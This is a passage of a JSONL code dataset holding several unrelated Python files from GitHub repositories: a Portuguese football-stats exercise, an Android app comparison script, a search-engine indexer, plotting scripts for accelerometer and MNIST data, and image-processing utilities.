')).title()\n n = int(input(f'Quantas partidas {jogador[\"nome\"]} jogou? '))\n for c in range(0,n):\n lista.append(int(input(f' Quantos gols na {c+1}o partida? ')))\n jogador['gols'] = lista.copy()\n jogador['total'] = sum(lista)\n time.append(jogador.copy())\n cont = str(input('Deseja continuar? ')).strip().upper()[0]\n while cont not in 'SN':\n cont = str(input('Deseja continuar? ')).strip().upper()[0]\n if cont == 'N':\n break\nprint('-'*50)\nprint(f'{\"cod.\":>4} ',end='')\nfor i in jogador.keys():\n print(f'{i:<15}',end='')\nprint()\nfor c, v in enumerate(time):\n print(f'{c} ',end='')\n for d in v.values():\n print(f'{str(d):<13} ',end='')\n print()\nprint('=-=' * 30)\nwhile True:\n busca = int(input('Mostrar dados de qual jogador? [999 para parar]: '))\n if busca == 999:\n break\n if busca >= len(time):\n print('ERRO! Jogador nao encontrado!')\n else:\n print(f'LEVANTAMENTO DO JOGADOR {time[busca][\"nome\"]}')\n for c, v in enumerate(time[busca]['gols']):\n print(f'No jogo {c} fez {v} gols')\n print('-'*40)\nprint('VOLTE SEMPRE!!!')\n\n\n\n\n\n\n","repo_name":"RichardRozin/Python","sub_path":"Exercicios Python Curso em Video/Mundo 3/ex095.py","file_name":"ex095.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34995255534","text":"import json\nimport csv\nimport shutil\nimport time\n\nfrom database import DataBase\nfrom util import create_if_not_exist\nimport os\nfrom subprocess import Popen, PIPE, STDOUT\n\nroot_path = \"D:\\\\PyCharm 2021.2.1\\\\code\\\\lint_full_compare\\\\download\\\\download_file\"\nsimi_droid_path = \"D:\\\\PyCharm 2021.2.1\\\\code\\\\lint_full_compare\\\\code_compare\\\\SimiDroid\\\\artefacts\"\ndb = DataBase()\n\nfor app_pair_dir in os.listdir(root_path):\n download_mission = db.query_download_mission_by_lite_app_id(app_pair_dir)\n lite_app_id = download_mission[1]\n full_app_id = download_mission[3]\n\n if download_mission[7] != 0 or download_mission[2] != 1 or download_mission[4] != 1:\n continue\n\n lite_apk_path = os.path.join(root_path, app_pair_dir, lite_app_id + \".apk\")\n full_apk_path = os.path.join(root_path, app_pair_dir, full_app_id + \".apk\")\n\n if not os.path.exists(lite_apk_path) or not os.path.exists(full_apk_path):\n print(\"do not find app pair on path \" + os.path.join(root_path, app_pair_dir))\n print(\"----------\")\n continue\n\n full_path = os.path.join(root_path, app_pair_dir, full_app_id)\n lite_path = os.path.join(root_path, app_pair_dir, lite_app_id)\n\n create_if_not_exist(full_path)\n create_if_not_exist(lite_path)\n\n shutil.copy(lite_apk_path, simi_droid_path)\n shutil.copy(full_apk_path, simi_droid_path)\n\n print(\"using SimiDroid on {} and {}\".format(lite_app_id, full_app_id))\n os.chdir(simi_droid_path)\n\n p = Popen(['java', '-jar', 'SimiDroid.jar', lite_app_id + \".apk\", full_app_id + \".apk\"], stdout=PIPE, stderr=PIPE)\n p.wait()\n\n time.sleep(1)\n os.remove(os.path.join(simi_droid_path, lite_app_id + \".apk\"))\n os.remove(os.path.join(simi_droid_path, full_app_id + \".apk\"))\n\n if os.path.exists(os.path.join(root_path, app_pair_dir, \"component_stat.csv\")):\n os.remove(os.path.join(root_path, app_pair_dir, \"component_stat.csv\"))\n\n result_file = \"{}-{}.json\".format(lite_app_id, full_app_id)\n\n with open(result_file, encoding=\"utf8\", errors=\"ignore\") as r:\n method_data = json.load(r)\n\n method_conclusion = method_data['conclusion']\n method_verbose = method_data['verbose']\n\n method_header = []\n method_data = []\n\n for _ in method_conclusion:\n method_header.append(_)\n method_data.append(method_conclusion[_])\n\n with open(os.path.join(root_path, app_pair_dir, \"method_stat.csv\"), \"a+\", newline=\"\") as w:\n writer = csv.writer(w)\n writer.writerow(method_header)\n writer.writerow(method_data)\n writer.writerow([])\n\n verbose_identical = method_verbose['identical']\n verbose_similar = method_verbose['similar']\n verbose_new = method_verbose['new']\n verbose_deleted = method_verbose['deleted']\n\n verbose_header = [\"method_signature\", \"lite\", \"full\", \"is_similar\"]\n verbose_data = []\n\n for _ in verbose_identical:\n verbose_data.append([_, 1, 1, 0])\n\n for _ in verbose_similar:\n verbose_data.append([_, 1, 1, 1])\n\n for _ in verbose_new:\n verbose_data.append([_, 1, 0, 0])\n\n for _ in verbose_deleted:\n verbose_data.append([_, 0, 1, 0])\n\n with open(os.path.join(root_path, app_pair_dir, \"method_stat.csv\"), \"a+\", newline=\"\") as w:\n writer = csv.writer(w)\n writer.writerow(verbose_header)\n for _ in verbose_data:\n writer.writerow(_)\n\n os.remove(result_file)\n db.update_method_compare_by_lite_app_id(lite_app_id, True)\n print(\"----------\")\n","repo_name":"Clearymk/lint_full_compare","sub_path":"compare_method.py","file_name":"compare_method.py","file_ext":"py","file_size_in_byte":3484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12435968653","text":"from src.commons.variables import temp_index_file, output_folder, index_folder, misc_folder, temp_folder\nfrom collections import defaultdict, OrderedDict\nimport os\n\nclass Indexer(object):\n def __init__(self, name, existing=False, cfile=None, tfile=None, dfile=None):\n self.termMap = []\n self.docMap = []\n self.indexname = name\n self.catalog = defaultdict(int)\n self.df = defaultdict(int)\n self.ttf = defaultdict(int)\n self.dlen = defaultdict(int)\n self.temp_file = temp_folder + name + \"temp\" + \".index\"\n self.temp_catalog_file = temp_folder + name + \"temp\" + \".catalog\"\n self.clearTempFile()\n self.consolidate = 0\n self.catalog2 = {}\n\n if existing:\n self.readDocMap(docFile=dfile)\n self.readTermMap(tfile)\n self.readCatalog(cfile)\n\n def clearTempFile(self):\n try:\n f = open(self.temp_file, 'r+')\n f.truncate()\n except FileNotFoundError:\n f = open(self.temp_file, 'w')\n\n def readTermMap(self, termFile):\n termMap = []\n # Read from file\n with open(termFile, \"r\") as infile:\n for line in infile:\n termMap.append(line.strip())\n self.termMap = termMap\n\n def readDocMap(self, docFile):\n docMap = []\n # Read from file\n with open(docFile, \"r\") as infile:\n for line in infile:\n docMap.append(line.strip())\n self.docMap = docMap\n\n def getVocabSize(self):\n return len(self.termMap)\n\n def getSumTTF(self):\n return len(self.ttf.values())\n\n def getDLen(self, name):\n id = self.getItemName(name, self.docMap)\n return self.dlen[id]\n\n def addDLen(self, name, dlen):\n id = self.getSetItemId(name, self.docMap)\n self.dlen[id] = dlen\n\n def getAvgDLen(self):\n return sum(self.dlen.values())/len(self.dlen)\n\n def getSetItemId(self, term, someMap):\n if term not in someMap:\n i = len(someMap)\n someMap.append(term)\n else:\n i = someMap.index(term)\n return i\n\n def getItemName(self, id, someMap):\n return someMap[id]\n\n def createTermList(self, docs_tokens):\n itermCount = defaultdict(dict)\n for doc, tokens in docs_tokens.items():\n for token in enumerate(tokens):\n pos = token[0]\n tokenId = self.getSetItemId(token[1], self.termMap)\n docId = self.getSetItemId(doc, self.docMap)\n\n if tokenId not in itermCount.keys():\n itermCount[tokenId] = {}\n if docId not in itermCount[tokenId].keys():\n itermCount[tokenId][docId] = {}\n itermCount[tokenId][docId]['tf'] = 0\n itermCount[tokenId][docId]['pos'] = []\n itermCount[tokenId][docId]['tf'] += 1\n itermCount[tokenId][docId]['pos'].append(pos)\n for tokenId, docs in itermCount.items():\n self.df[tokenId] += len(docs.keys())\n self.ttf[tokenId] += sum(map(lambda d: d['tf'], docs.values()))\n\n for tokenId in itermCount.keys():\n temp_docs = itermCount[tokenId]\n sorted_docs = OrderedDict(sorted(temp_docs.items(), key=lambda x: x[1][\"tf\"], reverse=True))\n itermCount[tokenId] = sorted_docs\n return itermCount\n\n def readTermFromFile(self, filename, termIdRef):\n ntc = {}\n f = open(filename)\n f.seek(self.catalog[termIdRef])\n line = f.readline().strip()\n (termId, df, ttf, docs) = line.strip().split(\":\")\n mdocs = docs.split(\"|\")\n for p in mdocs:\n docId, tf, els = p.split(\",\")\n ntc[docId] = {}\n ntc[docId]['tf'] = int(tf)\n ntc[docId]['pos'] = list(map(lambda x: int(x), els.split(\".\")))\n return ntc, int(df), int(ttf)\n\n def readTermFromFile2(self, filename, termIdRef):\n ntc = {}\n f = open(filename)\n f.seek(self.catalog2[termIdRef][filename])\n line = f.readline().strip()\n (termId, df, ttf, docs) = line.strip().split(\":\")\n mdocs = docs.split(\"|\")\n for p in mdocs:\n docId, tf, els = p.split(\",\")\n ntc[docId] = {}\n ntc[docId]['tf'] = int(tf)\n ntc[docId]['pos'] = list(map(lambda x: int(x), els.split(\".\")))\n return ntc, int(df), int(ttf)\n\n def mergeDocs(self, termId, filename, nw_docs):\n old_docs, df, ttf = self.readTermFromFile(filename, termId)\n\n join_docs = {}\n join_docs.update(nw_docs)\n join_docs.update(old_docs)\n newdocs = OrderedDict(sorted(join_docs.items(), key=lambda x: x[1][\"tf\"], reverse=True))\n return newdocs\n\n def writeTempData(self, itermCount, consolidateRate=5):\n with open(self.temp_file, \"a\") as out:\n for termId, docs in itermCount.items():\n if termId in self.catalog.keys():\n # print(\"Merging {} term with previous index.\".format(termId))\n docs = self.mergeDocs(termId, self.temp_file, docs)\n # print(docs)\n self.catalog[termId] = out.tell()\n outStr = str(termId) + \":\" + str(self.df[termId]) + \":\" + str(self.ttf[termId]) + \":\"\n tempStr = []\n\n for docId, values in docs.items():\n tempStr.append(str(docId) + \",\" + str(values['tf']) + \",\" + \"{}\".format(\n \".\".join(map(lambda x: str(x), values['pos']))))\n outStr += \"|\".join(tempStr)\n # print(outStr)\n out.write(outStr + \"\\n\")\n self.consolidate += 1\n if self.consolidate > consolidateRate:\n print(\"Consolidating temp index. Current vocab size: \", len(self.termMap))\n self.consolidate_temp()\n self.consolidate = 0\n\n def writeCatalog(self, filename):\n with open(filename, \"w+\") as out:\n for termId, offset in self.catalog.items():\n out.write(str(termId) + \",\" + str(offset) + \"\\n\")\n\n def writeCatalogTemp(self, filename, indexfile):\n with open(filename, \"w+\") as out:\n for termId, offset in self.catalog2[indexfile].items():\n out.write(str(termId) + \",\" + str(offset) + \"\\n\")\n\n def writeTermMap(self, filename):\n with open(filename, \"w+\") as out:\n for term in self.termMap:\n out.write(term + \"\\n\")\n\n def writeDocMap(self, filename):\n with open(filename, \"w+\") as out:\n for doc in self.docMap:\n out.write(doc + \"\\n\")\n\n def readCatalog(self, catalogFile):\n catalog = defaultdict(int)\n # Read from file\n with open(catalogFile, \"r\") as infile:\n for line in infile:\n termId, offset = line.strip().split(\",\")\n catalog[int(termId)] = int(offset)\n self.catalog = catalog\n\n def writeDLen(self, filename):\n with open(filename, \"w+\") as out:\n for termId, dlen in self.dlen.items():\n out.write(str(termId) + \",\" + str(dlen) + \"\\n\")\n\n def writeTTF(self, filename):\n with open(filename, \"w+\") as out:\n for termId, dlen in self.ttf.items():\n out.write(str(termId) + \",\" + str(dlen) + \"\\n\")\n\n def writeDF(self, filename):\n with open(filename, \"w+\") as out:\n for termId, dlen in self.df.items():\n out.write(str(termId) + \",\" + str(dlen) + \"\\n\")\n\n def readDLen(self, dlenFile):\n catalog = defaultdict(int)\n # Read from file\n with open(dlenFile, \"r\") as infile:\n for line in infile:\n termId, dlen = line.strip().split(\",\")\n catalog[int(termId)] = int(dlen)\n self.dlen = catalog\n\n def readTTF(self, dlenFile):\n catalog = defaultdict(int)\n # Read from file\n with open(dlenFile, \"r\") as infile:\n for line in infile:\n termId, dlen = line.strip().split(\",\")\n catalog[int(termId)] = int(dlen)\n self.ttf = catalog\n\n def readDF(self, dlenFile):\n catalog = defaultdict(int)\n # Read from file\n with open(dlenFile, \"r\") as infile:\n for line in infile:\n termId, dlen = line.strip().split(\",\")\n catalog[int(termId)] = int(dlen)\n self.df = catalog\n\n def reindex(self, outfile= output_folder + \"1.index\"):\n \"\"\" Reads from current temp file and catalog and creates a final index and catalog \"\"\"\n new_catalog = defaultdict(int)\n with open(outfile, \"w\") as out:\n for termId, offset in self.catalog.items():\n docs, df, ttf = self.readTermFromFile(self.temp_file, termId)\n new_catalog[termId] = out.tell()\n outStr = str(termId) + \":\" + str(df) + \":\" + str(ttf) + \":\"\n tempStr = []\n\n for docId, values in docs.items():\n tempStr.append(str(docId) + \",\" + str(values['tf']) + \",\" + \"{}\".format(\n \".\".join(map(lambda x: str(x), values['pos']))))\n outStr += \"|\".join(tempStr)\n # print(outStr)\n out.write(outStr + \"\\n\")\n self.catalog = new_catalog\n\n def consolidate_temp(self):\n \"\"\" Reads from current temp file and catalog and creates a final index and catalog \"\"\"\n new_catalog = defaultdict(int)\n temp_index_file_new = self.temp_file+\".new\"\n with open(temp_index_file_new, \"w\") as out:\n for termId, offset in self.catalog.items():\n docs, df, ttf = self.readTermFromFile(self.temp_file, termId)\n new_catalog[termId] = out.tell()\n outStr = str(termId) + \":\" + str(df) + \":\" + str(ttf) + \":\"\n tempStr = []\n\n for docId, values in docs.items():\n tempStr.append(str(docId) + \",\" + str(values['tf']) + \",\" + \"{}\".format(\n \".\".join(map(lambda x: str(x), values['pos']))))\n outStr += \"|\".join(tempStr)\n out.write(outStr + \"\\n\")\n os.remove(self.temp_file)\n os.rename(temp_index_file_new, self.temp_file)\n self.catalog = new_catalog\n\n def cleanup(self):\n index_file = index_folder + self.indexname + \".index\"\n catalog_file = misc_folder + self.indexname + \".catalog\"\n term_file = misc_folder + self.indexname + \".termmap\"\n doc_file = misc_folder + self.indexname + \".docmap\"\n dlen_file = misc_folder + self.indexname + \".dlen\"\n ttf_file = misc_folder + self.indexname + \".ttf\"\n df_file = misc_folder + self.indexname + \".df\"\n\n self.reindex(index_file)\n self.writeCatalog(catalog_file)\n self.writeTermMap(term_file)\n self.writeDocMap(doc_file)\n self.writeDLen(dlen_file)\n self.writeTTF(ttf_file)\n self.writeDF(df_file)\n\n # self.clearTempFile()\n\n\n def mergeDocs2(self, termId, filename, nw_docs):\n old_docs, _, _ = self.readTermFromFile2(filename, termId)\n\n join_docs = {}\n join_docs.update(nw_docs)\n join_docs.update(old_docs)\n # TODO: Switch to custom merge sort\n newdocs = OrderedDict(sorted(join_docs.items(), key=lambda x: x[1][\"tf\"], reverse=True))\n return newdocs\n\n def writeTempData2(self, itermCount):\n current_file = self.temp_file + str(self.consolidate)\n with open(current_file, \"w+\") as out:\n for termId, docs in itermCount.items():\n if termId not in self.catalog2.keys():\n self.catalog2[termId] = defaultdict(int)\n offset = out.tell()\n self.catalog2[termId][current_file] = offset\n self.catalog[termId] = offset\n outStr = str(termId) + \":\" + str(self.df[termId]) + \":\" + str(self.ttf[termId]) + \":\"\n tempStr = []\n\n for docId, values in docs.items():\n tempStr.append(str(docId) + \",\" + str(values['tf']) + \",\" + \"{}\".format(\n \".\".join(map(lambda x: str(x), values['pos']))))\n outStr += \"|\".join(tempStr)\n # print(outStr)\n out.write(outStr + \"\\n\")\n self.writeCatalog(self.temp_catalog_file + str(self.consolidate))\n self.catalog = defaultdict(int)\n self.consolidate += 1\n\n def mergeAll(self, outfile= output_folder + \"1.index\"):\n print(\"Writing final file..\")\n new_catalog = defaultdict(int)\n with open(outfile, \"w\") as out:\n for termId, values in self.catalog2.items():\n docs = {}\n for filename, offset in values.items():\n docs = self.mergeDocs2(termId, filename, docs)\n new_catalog[termId] = out.tell()\n outStr = str(termId) + \":\" + str(self.df[termId]) + \":\" + str(self.ttf[termId]) + \":\"\n tempStr = []\n\n for docId, values in docs.items():\n tempStr.append(str(docId) + \",\" + str(values['tf']) + \",\" + \"{}\".format(\n \".\".join(map(lambda x: str(x), values['pos']))))\n outStr += \"|\".join(tempStr)\n # print(outStr)\n out.write(outStr + \"\\n\")\n self.catalog = new_catalog\n\n def cleanup2(self):\n index_file = index_folder + self.indexname + \".index\"\n catalog_file = misc_folder + self.indexname + \".catalog\"\n term_file = misc_folder + self.indexname + \".termmap\"\n doc_file = misc_folder + self.indexname + \".docmap\"\n dlen_file = misc_folder + self.indexname + \".dlen\"\n ttf_file = misc_folder + self.indexname + \".ttf\"\n df_file = misc_folder + self.indexname + \".df\"\n\n self.mergeAll(index_file)\n self.writeCatalog(catalog_file)\n self.writeTermMap(term_file)\n self.writeDocMap(doc_file)\n self.writeDLen(dlen_file)\n self.writeTTF(ttf_file)\n self.writeDF(df_file)\n\n # self.clearTempFile()","repo_name":"ronnygeo/SearchEngine","sub_path":"src/indexer/Indexer.py","file_name":"Indexer.py","file_ext":"py","file_size_in_byte":14185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23858260286","text":"from matplotlib import pyplot as plt\nimport numpy as np\nimport pandas as pd\ndef loadTimeSeriesCSV(tsFile):\n \"\"\"Load time series csv.gz file and append date/time column to it\n\n The time associated with each reading can be inferred from the very first\n row, which describes the sample rate, start and end times of the data.\n\n For example header\n \"acceleration (mg) - 2014-05-07 13:29:50 - 2014-05-13 09:50:25 - sampleRate = 5 seconds, imputed\"\n indicates that the first measurement time is at 2014-05-07 13:29:50, the second\n at 2014-05-07 13:29:55, the third at 2014-05-07 13:30:00 ... and the last at\n 2014-05-13 09:50:25.\n\n :param str tsFile: Output filename for .csv.gz file\n\n :return: Pandas dataframe of epoch data\n :rtype: pandas.DataFrame\n\n :Example:\n >>> import accUtils\n >>> import pandas as pd\n >>> df = accUtils.loadTimeSeriesCSV(\"sample-timeSeries.csv.gz\")\n \n \"\"\"\n DAYS = ['mon', 'tue', 'wed', 'thur', 'fri', 'sat', 'sun']\n TIME_SERIES_COL = 'time'\n # get header\n header = pd.read_csv(tsFile, nrows=1, header=0, compression='gzip')\n headerInfo = header.columns[0]\n if header.columns[0] == TIME_SERIES_COL:\n headerInfo = header.columns[1]\n header.columns = [TIME_SERIES_COL, 'acc'] + header.columns[2:].tolist()\n else:\n header.columns = ['acc'] + header.columns[1:].tolist()\n # read start time, endtime, and sample rate\n startDate = headerInfo.split(\" - \")[1]\n endDate = headerInfo.split(\" - \")[2]\n sampleRate = headerInfo.split(\"sampleRate = \")[1].split(\" \")[0]\n\n # read data\n tsData = pd.read_csv(tsFile, skiprows=1, header=None, names=header.columns,\n compression='gzip')\n if header.columns[0] != TIME_SERIES_COL:\n tsData.index = pd.date_range(start=startDate, end=endDate,\n freq=str(sampleRate) + 's')\n return tsData\n\ndf = loadTimeSeriesCSV(r'C:\\Users\\simpl\\Documents\\VM_Ubuntu\\50\\45676_50hz_CWA-DATA-timeSeries.csv.gz')\nwalking_interval2 = df[df['walking'] == 1].index # ._short_repr will be the str\nsleeping_interval2 = df[df['sleep'] == 1].index\nsedentary_interval2 = df[df['sedentary'] == 1].index\nmoderate_interval2 = df[df['moderate'] == 1].index\nimputed_interval2 = df[df['imputed'] == 1].index\n\n\nplt.figure()\nbarWidth = 0.375\nnames = ['walking', 'sleeping', 'sedentary', 'moderate', 'imputed']\n\nr1 = range(5)\nr2 = map(lambda x: (x + 0.5 * barWidth), r1)\nr1 = map(lambda x: (x - 0.5 * barWidth), r1)\n\n# Create red Bars walking\nplt.bar(r1, [len(walking_interval), len(sleeping_interval), len(sedentary_interval), len(moderate_interval), len(imputed_interval)], color='#CD6155', edgecolor='white', width=barWidth,\n label=\"100Hz\")\n# Create yellow Bars moderate\nplt.bar(r2, [len(walking_interval2), len(sleeping_interval2), len(sedentary_interval2), len(moderate_interval2), len(imputed_interval2)], color='#F5B041', edgecolor='white', width=barWidth, label=\"50Hz\")\n# Custom axis\nplt.xticks(range(5), names)\nplt.xlabel(\"Activities\")\nplt.ylabel(\"Epochs\")\nplt.legend(loc=\"NorthOutside\", fontsize=20)\n# Show graphic\nplt.show()\n\n","repo_name":"Tim-Yu/BrainWear_gait_analysis","sub_path":"archived/100_50.py","file_name":"100_50.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73358894632","text":"import math\ndef power(model):\n l = len(model)\n count = 0\n g = 0\n d= {}\n for i in model:\n if i not in d:\n d[i] = 1\n else:\n d[i] += 1\n ceiling = int(math.ceil(l/2))\n ds = sorted(d.items(), key=lambda x: x[1], reverse =True)\n for i in ds:\n if i[1]< ceiling and count < ceiling:\n count += i[1]\n g += 1\n else:\n break\n return g\n\nprint(power([3,4,6,11,9,9,9,9,8,8,8,8,8,8]))\n\n\n","repo_name":"Ashi-s/coding_problems","sub_path":"FT_Coding/Akuna/akuna power.py","file_name":"akuna power.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31279397139","text":"import tensorflow as tf\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom collections import Counter\n\n# Load MNIST dataset\nmnist = tf.keras.datasets.mnist\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\n\n# Get 9 random indices\nrandom_indices = np.random.choice(len(x_test), 9, replace=False)\n\n# Plot 3x3 grid\nfig, axes = plt.subplots(3, 3, figsize=(6, 6))\n\nfor i, ax in enumerate(axes.flat):\n idx = random_indices[i]\n image = x_test[idx]\n label = y_test[idx]\n \n ax.imshow(image, cmap='gray')\n ax.set_title(f\"Amostra: {label}\")\n ax.axis('off')\n\nplt.tight_layout()\n#plt.show()\nplt.savefig ('mnist_samples.pdf')\n\n\nclass_counts = Counter(y_train)\nfor label, count in class_counts.items():\n print(f\"(Training set) Class {label}: {count} samples\")\n\nclass_counts = Counter(y_test)\nfor label, count in class_counts.items():\n print(f\"(Test set) Class {label}: {count} samples\")\n","repo_name":"kaylani2/mestrado","sub_path":"src/plot_mnist_samples.py","file_name":"plot_mnist_samples.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8825682085","text":"import os\r\nimport numpy as np\r\nfrom cg_openmm.utilities.helix_optimize_geometry import *\r\n\r\n# Optimize radius, pitch, and positions of equally spaced particles along a helix,\r\n# with constraints on bb-bb and bb-sc bond lengths.\r\n\r\n# Particle LJ 12-6 parameters:\r\nsigma_bb = 1.0 * unit.angstrom\r\nsigma_sc = 1.0 * unit.angstrom\r\n\r\nepsilon_bb = 1.0 * unit.kilojoule_per_mole\r\nepsilon_sc = 1.0 * unit.kilojoule_per_mole\r\n\r\n# Number of backbone particles:\r\nn_particle_bb = 24\r\n\r\n# Bond constraints (equilibrium values)\r\nbond_dist_bb = 1.08 * unit.angstrom\r\nbond_dist_sc = 1.08 * unit.angstrom\r\n\r\nopt_solution, geometry = optimize_helix_openmm_energy(\r\n n_particle_bb, sigma_bb, sigma_sc, epsilon_bb, epsilon_sc,\r\n bond_dist_bb=bond_dist_bb, bond_dist_sc=bond_dist_sc,\r\n pdbfile='LJ_helix_openmm_energy_constrained.pdb',\r\n plotfile='LJ_helix_openmm_energy_constrained.pdf',\r\n DE_popsize=50)\r\n\r\nprint(opt_solution)\r\nprint(geometry)","repo_name":"shirtsgroup/cg_openmm","sub_path":"examples/helix_modeling/optimize_helix_parameters/optimize_helices_openmm_energy_constrained.py","file_name":"optimize_helices_openmm_energy_constrained.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"72"} +{"seq_id":"11777064011","text":"from bson.objectid import ObjectId\nfrom netuse.database.execution import Execution\nfrom netuse.database.results import HTTPTrace\n\ndef reset_execution(execution_id): \n for req in HTTPTrace.objects(execution=execution_id):\n req.delete()\n \n ex = Execution.objects(id=execution_id).first()\n ex.execution_date = None\n ex.save()\n\n\ndef main():\n import argparse\n \n parser = argparse.ArgumentParser(description='Manage data.')\n parser.add_argument('-o','--oid', default=None, dest='oid',\n help='Specify the object id of the execution set to be destroyed.')\n \n args = parser.parse_args()\n objID = args.oid\n \n if objID==None:\n raise Exception(\"A oid should be provided.\")\n else:\n reset_execution(ObjectId(objID))\n\n\nif __name__ == '__main__':\n main()","repo_name":"gomezgoiri/Semantic-WoT-Environment-Simulation","sub_path":"src/netuse/database/management/delete_execution.py","file_name":"delete_execution.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23910037407","text":"import torch\nimport matplotlib.pylab as plt\nimport scipy as sp\nfrom torch.autograd import Variable\nfrom numbers import Number\nimport scipy.ndimage\nimport numpy as np\n\n# Baby-ARC related imports\n\ndef to_np_array(*arrays, **kwargs):\n array_list = []\n for array in arrays:\n if isinstance(array, Variable):\n if array.is_cuda:\n array = array.cpu()\n array = array.data\n if isinstance(array, torch.Tensor) or isinstance(array, torch.FloatTensor) or isinstance(array, torch.LongTensor) or isinstance(array, torch.ByteTensor) or \\\n isinstance(array, torch.cuda.FloatTensor) or isinstance(array, torch.cuda.LongTensor) or isinstance(array, torch.cuda.ByteTensor):\n if array.is_cuda:\n array = array.cpu()\n array = array.numpy()\n if isinstance(array, Number):\n pass\n elif isinstance(array, list) or isinstance(array, tuple):\n array = np.array(array)\n elif array.shape == (1,):\n if \"full_reduce\" in kwargs and kwargs[\"full_reduce\"] is False:\n pass\n else:\n array = array[0]\n elif array.shape == ():\n array = array.tolist()\n array_list.append(array)\n if len(array_list) == 1:\n array_list = array_list[0]\n return array_list\n \ndef get_obj_from_mask(input, obj_mask=None):\n \"\"\"Get the object from the mask.\"\"\"\n if obj_mask is None:\n return input\n assert input.shape[-2:] == obj_mask.shape\n if isinstance(input, np.ndarray):\n input = torch.FloatTensor(input)\n if isinstance(obj_mask, np.ndarray):\n obj_mask = torch.BoolTensor(obj_mask.astype(bool))\n shape = input.shape\n if len(shape) == 3:\n output = torch.zeros_like(input).reshape(input.shape[0], -1)\n idx = obj_mask.flatten().bool()\n output[:, idx] = input.reshape(input.shape[0], -1)[:, idx]\n else:\n output = torch.zeros_like(input).flatten()\n idx = obj_mask.flatten().bool()\n output[idx] = input.flatten()[idx]\n return output.reshape(shape)\n\ndef shrink(input):\n \"\"\" Find the smallest region of your matrix that contains all the nonzero elements \"\"\"\n if not isinstance(input, torch.Tensor):\n input = torch.FloatTensor(input)\n is_numpy = True\n else:\n is_numpy = False\n if input.abs().sum() == 0:\n return input, (0, 0, input.shape[-2], input.shape[-1])\n if len(input.shape) == 3:\n input_core = input.mean(0)\n else:\n input_core = input\n rows = torch.any(input_core.bool(), axis=-1)\n cols = torch.any(input_core.bool(), axis=-2)\n ymin, ymax = torch.where(rows)[0][[0, -1]]\n xmin, xmax = torch.where(cols)[0][[0, -1]]\n shrinked = input[..., ymin:ymax+1, xmin:xmax+1]\n pos = (ymin.item(), xmin.item(), shrinked.shape[-2], shrinked.shape[-1])\n if is_numpy:\n shrinked = to_np_array(shrinked)\n return shrinked, pos\n\ndef find_connected_components(input, is_diag=True, is_mask=False):\n \"\"\"Find all the connected components, regardless of color.\"\"\"\n input = to_np_array(input)\n shape = input.shape\n if is_diag:\n structure = [[1,1,1], [1,1,1], [1,1,1]]\n else:\n structure = [[0,1,0], [1,1,1], [0,1,0]]\n if len(shape) == 3:\n input_core = input.mean(0)\n else:\n input_core = input\n labeled, ncomponents = sp.ndimage.measurements.label(input_core, structure)\n\n objects = []\n for i in range(1, ncomponents + 1):\n obj_mask = (labeled == i).astype(int)\n obj = shrink(get_obj_from_mask(input, obj_mask))\n if is_mask:\n objects.append(obj + (obj_mask,))\n else:\n objects.append(obj)\n return objects\n\ndef find_connected_components_colordiff(input, is_diag=True, color=True):\n \"\"\"Find all the connected components, considering color.\"\"\"\n input = to_np_array(input)\n shape = input.shape\n\n if len(shape) == 3:\n assert shape[0] == 3\n color_list = np.unique(input.reshape(shape[0], -1), axis=-1).T\n bg_color = np.zeros(shape[0])\n else:\n input_core = input\n color_list = np.unique(input)\n bg_color = 0\n\n objects = []\n for c in color_list:\n if not (c == bg_color).all():\n if len(shape) == 3:\n mask = np.array(input!=c[:,None,None]).any(0, keepdims=True).repeat(shape[0], axis=0)\n else:\n mask = np.array(input!=c, dtype=int)\n color_mask = np.ma.masked_array(input, mask)\n color_mask = color_mask.filled(fill_value=0)\n objs = find_connected_components(color_mask, is_diag=is_diag)\n objects += objs\n return objects\n\n \n# general util functions like plots, helpers to manipulate matrics\ndef remove_duplicates(seq):\n seen = set()\n seen_add = seen.add\n return [x for x in seq if not (x in seen or seen_add(x))]\n\ndef get_indices(tensor, pos=None, includes_neighbor=False, includes_self=True):\n \"\"\"Get the indices of nonzero elements of an image.\n\n Args:\n tensor: 2D or 3D tensor. If 3D, it must have the shape of [C, H, W] where C is the number of channels.\n pos: position of the upper-left corner pixel of the tensor in the larger image. If None, will default as (0, 0).\n includes_neighbor: whether to include indices of neighbors (up, down, left, right).\n includes_self: if includes_neighbor is True, whether to include its own indices.\n\n Returns:\n indices: a list of indices satisfying the specification.\n \"\"\"\n mask = tensor > 0\n if len(mask.shape) == 3:\n mask = mask.any(0)\n pos_add = (int(pos[0]), int(pos[1])) if pos is not None else (0, 0)\n indices = []\n self_indices = []\n for i, j in torch.stack(torch.where(mask)).T:\n i, j = int(i) + pos_add[0], int(j) + pos_add[1]\n self_indices.append((i, j))\n if includes_neighbor:\n indices.append((i + 1, j))\n indices.append((i - 1, j))\n indices.append((i, j + 1))\n indices.append((i, j - 1))\n if includes_neighbor:\n if not includes_self:\n indices = list(set(indices).difference(set(self_indices)))\n else:\n indices = remove_duplicates(indices)\n else:\n indices = self_indices\n return indices\n\ndef plot_with_boundary(image, plt):\n im = plt.imshow(image, interpolation='none', vmin=0, vmax=1, aspect='equal');\n height, width = np.array(image).shape[:2]\n ax = plt.gca();\n\n # Major ticks\n ax.set_xticks(np.arange(0, width, 1));\n ax.set_yticks(np.arange(0, height, 1));\n\n # Labels for major ticks\n ax.set_xticklabels(np.arange(1, width + 1, 1));\n ax.set_yticklabels(np.arange(1, height + 1, 